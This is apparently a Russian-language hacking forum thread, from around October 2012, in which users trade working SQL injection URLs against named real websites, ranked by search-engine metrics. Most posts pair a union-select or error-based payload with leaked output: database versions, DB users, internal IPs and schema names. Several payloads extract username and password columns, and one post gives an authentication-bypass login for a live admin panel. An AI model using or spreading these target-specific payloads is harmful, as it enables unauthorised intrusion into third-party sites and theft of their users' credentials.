(CY) 0
(PR) 2
++++++++++++++++++++++++++++++++++++++++++++++
www.soapcrone.com
http://www.soapcrone.com/ebook.php?id=5+or+1+group+by+concat%28%28select+ve rsion%28%29%29,0x00,floor%28rand%280%29*2%29%29hav ing+min%280%29+or+1--+
5.1.65-community-log
(CY) 0
(PR) 3
++++++++++++++++++++++++++++++++++++++++++++++
www.wprb.com
http://www.wprb.com/printplaylist.php?show_id=1826%27+or+1+group+by+co ncat%28%28select+version%28%29%29,0x00,floor%28ran d%280%29*2%29%29having+min%280%29+or+1--+
5.0.95-community-log
(CY) 10
(PR) 6
++++++++++++++++++++++++++++++++++++++++++++++
TVOnline
Code:
http://tv.powernet.com.ru/files/download.php?tv=archive&channel=1 and(select 1 from(select count(*),concat((select (select (select distinct concat(0x7e,0x27,schema_name,0x27,0x7e) from `information_schema`.schemata limit 1,1)) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1
Code:
http://www.strida.ru/strid/?id=-7'+union+select+1,2,3,4,5,version(),User(),8,9,dat abase(),11,12,13,14+--+
Code:
http://association.cqu.edu.au/cqusa_faq/php/view-faq.php?id=-45+union+select+1,user(),version(),4,5,database(), 7--
Code:
http://www.indiaoz.com.au/Associations/moreinfo.php?id=-47+union+select+1,version(),user(),database(),5,6, 7,8--
Code:
http://apva.org/rediscovery/page.php?page_id=-2+union+select+version(),database(),3,4--
Code:
http://www.ruscourier.ru/archive.php?id=-3164+union+select+version()--
www.iiserkol.ac.in
Code:
http://www.iiserkol.ac.in/~iipm/detail.php?id=-27%0Dunion%0Dselect%0D1,2,3,4,5,6,concat_ws(user() ,database(),version()),8,9,10,11,12,13,14,15--
TИЦ 10
PR 7
AR 922,369
confdbconfdb@localhost5.1.49-3~bpo50+1
www.littlepotatoes.com
Code:
http://www.littlepotatoes.com/blog/post.php?id=-389+union+select+1,2,3,4,5,6,group_concat(username ,0x03a,password),8,9,10,11,12,13,14,15,16,17,18,19 +from+lpcUsers--
PR 3
www.unitedcog.com
Code:
http://www.unitedcog.com/post.php?post_id=-38+union+select+group_concat(username,0x03a,passwo rd),2+from+users--
http://www.unitedcog.com/admin/
www.rx4eternity.com
Code:
http://www.rx4eternity.com/post.php?id=-38%27+union+select+1,2,3,4,5,group_concat(username ,0x03a,password),7,8+from+user--+f
PR 2
http://www.rx4eternity.com/cms/index.php
www.festamedioevale.it
Code:
http://www.festamedioevale.it/post.php?id=-38+union+select+1,concat_ws(user(),database(),vers ion()),3,4,5,6,7,8,9,10,11--
PR 2
Sql533676_1Sql533676@62.149.143.965.5.24-55-log
www.karatekidokan.com
Code:
http://www.karatekidokan.com/post.php?id=-38%27+union+select+1,concat_ws(user(),database(),v ersion()),3,4,5--+f
PR 1
KARATEKIDOKANSOKRATES@APACHE2-SNORT.STARFOX.DREAMHOST.COM5.1.53-LOG
www.molmatric.coop
http://www.molmatric.coop/mo/pages/mo1.php?id=2&n1=7&n2=1+and+1=0+ +union+select+1,2,3,group_concat(table_name),5,6,7 ,8,9+from+INFORMATION_SCHEMA.TABLES+- -+
5.0.32-Debian_7etch12-log
mo@localhost
molmatric_web
nemaniak
02.10.2012, 14:24
mobile.alkar.net ТИЦ-170
Code:
mobile.alkar.net/news.php?news_id=-40858'+union+select+1,2,concat_ws(0x3a,version(),u ser(),database()),4,5,6,7,8,9,0,11,12,13,14,15+--+
Code:
5.0.27-log:mobile@stream.alkar.net:mobile
primuzee.ru ТИЦ-190
Code:
primuzee.ru/event.php?id=-1+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,vers ion(),user(),database()),0,11,12,13,14,15,16+--+
Code:
5.5.24-log:u288262@10.8.3.33:u288262
medinform.biz ТИЦ-130
Code:
www.medinform.biz/low1.php?id=-28125+union+select+1,concat_ws(0x3a,version(),user (),database()),3+--+
Code:
4.1.25:medinfo5main@localhost:medinfo5main
nemaniak said:
medinform.biz ТИЦ-130
Code:
www.medinform.biz/low1.php?id=-28125+union+select+1,concat_ws(0x3a,version(),user (),database()),3+--+
Code:
4.1.25:medinfo5main@localhost:medinfo5main
+ ко всему тут ByPass Authentication
_ttp://medinform.biz/admin.php
Login = admin' or 1='1
Pass = admin' or 1='1
P.S. Админка убогая конечно (
Га-Ноцри
03.10.2012, 05:10
ТИц == 240, PR == 5, DMOZ == true, ЯК == true;
PHP:
http://www.domkultury.su/page.php?pageid=-2 union select 1,2,3,concat_ws(0x03a,user(),ver sion(),database())--
PR=3
http://armenbrok.am/pages.php?al=contacts1' or (select pow((select hex((select concat_ws(user_name,user_password,user_email,user_ lastip) from sed_users limit 1))),rand()*1e100))-- AND 1='1
warhamer2012
04.10.2012, 12:45
http://warfare.ru/?base=%28select%20convert%28int%2cCHAR%2852%29%2bC HAR%2867%29%2bCHAR%28117%29%2bCHAR%2875%29%2bCHAR% 28121%29%2bCHAR%28100%29%2bCHAR%2855%29%2bCHAR%286 6%29%2bCHAR%2874%29%2bCHAR%2888%29%2bCHAR%2883%29% 29%20FROM%20syscolumns%29&catid=311&linkid=1730&title=11th-coastal-msl-arty-bde
Крупный онлайн магазин электро-товаров
Site: www.3d-zone.ru
Inject:
Code:
_ttp://www.3d-zone.ru/catalog.php?class=15&type=-71+and+1=2+union+select+1,2,concat(@@version,0x3a, user(),0x3a,database()),4
Version = 5.0.45-log
User= colortv_zone@217.112.35.22
Database= colortv_zone
TYC= 20
PR = 6
немцы
_ttp://www.mega-ad.de/?seite=content/aktsend-1%27%20or%2096%20%3d%20%2794
// выкладывать учётные записи от сайтов
// строго запрещено
// + SQL инъекция публикуется в раскрученном виде, а не на стадии зачатия !!!
// BigBear
http://www.yogacenter.ru/page.php?id=20+order+by+5
Яндекс тИЦ 250
Яндекс Каталог Да
DMOZ каталог Да
wkuzyты бы для начала правила почитал
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot